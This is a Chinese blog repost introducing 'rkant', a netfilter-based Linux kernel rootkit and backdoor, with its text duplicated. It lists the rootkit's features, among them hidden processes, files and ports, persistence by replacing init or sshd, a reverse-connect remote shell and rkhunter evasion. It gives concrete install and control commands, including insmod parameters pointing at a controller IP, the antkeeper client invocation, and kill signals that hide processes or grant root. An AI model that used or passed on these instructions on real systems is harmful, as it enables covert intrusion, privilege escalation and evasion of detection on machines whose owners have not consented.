linux后门rootkit程序介绍
来源:互联网 发布:叽里呱啦儿童英语软件 编辑:程序博客网 时间:2024/05/16 09:53
rkant = rootkit ant,它是利用netfilter hook开发的一款linux后门rootkit程序。
rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu 14.04版本上面测试通过。
功能:
1、隐藏网络连接/端口,任意端口复用。不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录,用linux工具无法查看到。防删除。
3、隐藏模块信息。ls /sys/module和lsmod都看不到任何模块信息。
4、开机自启动,感染sshd或init。
5、反向连接。服务器定时连接指定的ip/port。
6、反调试,防止被跟踪和破解。内容加密传送。
7、隐藏进程。
8、任何用户提权,获得root权限。
rkant通过rootkit hunter1.4.0检查,不被发现。
rkant.ko设计要点:
1、安装时,会隐藏式启动一个后门进程(antclient)。
2、在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息,直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时,可传送需要执行的脚本比如sh /dev/rkant/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。
安装说明:
1.将rkant.ko/antclient放到server的/etc/rkant目录下面。
2.将antkeeper放到客户机上面,任何一个目录均可。
在server中,如果用的是eth1,那么,安装参数是:
insmod rkant.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8//damc/dip是目标机(client pc)的mac和ip,它是虚拟机2
antkeeper运行方法:
./antkeeper 192.168.2.8 192.168.2.113 //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就不填,留空。
测试情况:
1、内核版本升级后再测试。Ubuntu14.0.4.1基础上升级内核为3.16.1
2、通信测试回联。
同时支持icmp和tcp port方式回联。
./antkeeper 192.168.1.10[测试机,执行antkeeper的机器] 192.168.1.111[服务器,安装rkant.ko的机器]
安装模块方法:insmod rkant.ko dnet=eth0 dmac=00:0c:29:18:94:fa dip=192.168.2.9 dbg=1//dbg是新增的打开消息开关。
通过查看#dmesg可以看到打印消息,以方便定位问题。
记得要在另外一个计算机上执行:#./antkeeper 192.168.1.10 192.168.1.111
这样就可以收到回传消息,相当于一个远程shell。
3、开机自启动。
在server版本,可用init来替换原来的/sbin/init。在desktop版本,可以用sshd来替换/usr/sbin/sshd
新的init和sshd就会先调用/etc/rkant/bin/run.sh后再调用init和sshd。由此实现自启动。
记得先备份原来系统的init或sshd到/etc/rkant/bin目录下。/etc/rkant是安装目录,请先创建。
4、任何一个进程都可以隐藏。
方法:# kill -31 pid [你要隐藏的进程的pid]
5、隐藏某一个用户。
>>无法隐藏用户。只能是用linux缺省就有帐户比如sys或bin帐户来登录,然后进行提权。
rkant包括服务器端程序(on victim server)和客户端程序(on user client pc),在ubuntu 14.04版本上面测试通过。
功能:
1、隐藏网络连接/端口,任意端口复用。不影响系统的正常工作和服务的正常运行。
2、隐藏文件以及目录,用linux工具无法查看到。防删除。
3、隐藏模块信息。ls /sys/module和lsmod都看不到任何模块信息。
4、开机自启动,感染sshd或init。
5、反向连接。服务器定时连接指定的ip/port。
6、反调试,防止被跟踪和破解。内容加密传送。
7、隐藏进程。
8、任何用户提权,获得root权限。
rkant通过rootkit hunter1.4.0检查,不被发现。
rkant.ko设计要点:
1、安装时,会隐藏式启动一个后门进程(antclient)。
2、在内核空间中尝试向指定的pc机(模块参数指定mac_addr/ip/port)发送探测消息,直到收到回应为止。
3、pc机(antkeeper)给server回送hello消息时,可传送需要执行的脚本比如sh /dev/rkant/myspy.sh,这样达到远程执行命令的目的。
4、在收到pc机给出的hello消息后,rootdoor回送hello_ack消息。在hello_ack消息中可送出任何想送出的信息,比如myspy.sh的执行结果或是其它信息。
安装说明:
1.将rkant.ko/antclient放到server的/etc/rkant目录下面。
2.将antkeeper放到客户机上面,任何一个目录均可。
在server中,如果用的是eth1,那么,安装参数是:
insmod rkant.ko dnet=eth1 dmac=00:0c:29:40:99:20 dip=192.168.2.8//damc/dip是目标机(client pc)的mac和ip,它是虚拟机2
antkeeper运行方法:
./antkeeper 192.168.2.8 192.168.2.113 //第一个ip是本机的ip,第二个ip是server的ip。
如果拿不到server的ip,也就是说server只有内网IP,无公网IP。那第二个ip就不填,留空。
测试情况:
1、内核版本升级后再测试。Ubuntu14.0.4.1基础上升级内核为3.16.1
2、通信测试回联。
同时支持icmp和tcp port方式回联。
./antkeeper 192.168.1.10[测试机,执行antkeeper的机器] 192.168.1.111[服务器,安装rkant.ko的机器]
安装模块方法:insmod rkant.ko dnet=eth0 dmac=00:0c:29:18:94:fa dip=192.168.2.9 dbg=1//dbg是新增的打开消息开关。
通过查看#dmesg可以看到打印消息,以方便定位问题。
记得要在另外一个计算机上执行:#./antkeeper 192.168.1.10 192.168.1.111
这样就可以收到回传消息,相当于一个远程shell。
3、开机自启动。
在server版本,可用init来替换原来的/sbin/init。在desktop版本,可以用sshd来替换/usr/sbin/sshd
新的init和sshd就会先调用/etc/rkant/bin/run.sh后再调用init和sshd。由此实现自启动。
记得先备份原来系统的init或sshd到/etc/rkant/bin目录下。/etc/rkant是安装目录,请先创建。
4、任何一个进程都可以隐藏。
方法:# kill -31 pid [你要隐藏的进程的pid]
5、隐藏某一个用户。
>>无法隐藏用户。只能是用linux缺省就有帐户比如sys或bin帐户来登录,然后进行提权。
当前用户取得root权限方法:# kill -64 65535
阅读全文
0 0
- linux后门rootkit程序介绍
- 后门技术和Linux LKM Rootkit详解
- 利用netfilter hook开发llinux后门rootkit程序
- Rootkit-LKM编程劫持系统调用,隐藏后门程序backdoor(ps,ls)
- rootkit 介绍
- 这文章介绍了Linux下rootkit常见玩法-Linux Rootkit Sample && Rootkit Defenser Analysis - .Little Hann - 时间 2014-
- 后门程序常用办法(linux)
- Linux 2.6.x平台下后门程序
- wnps 0.26 一款Linux后门程序
- 后门程序
- 介绍linux上两种rootkits检测工具: Rootkit Hunter和Chkrootkit
- 介绍linux上两种rootkits检测工具: Rootkit Hunter和Chkrootkit
- Linux后门
- Linux后门
- linux后门
- vc++ ICMP后门后门程序
- Rootkit Hunter 使用介绍
- rootkit介绍与检测
- 高通平台之开机logo,企鹅logo替换
- jade模板引擎的使用方法
- 111 C语言结构体和指针
- mysql常见错误
- Spring Security(07)——缓存UserDetails
- linux后门rootkit程序介绍
- 响应式开发中的媒体查询
- 新闻播报/滚动和淡入淡出
- Android MVP模式初次实践
- JavaScript ---- 实现跨域方法总结
- asp.net重新将值赋予新声明的DataTable中
- 深度学习概述
- 《道德经》·第二十七章
- Android屏幕适配全攻略(最权威的官方适配指导)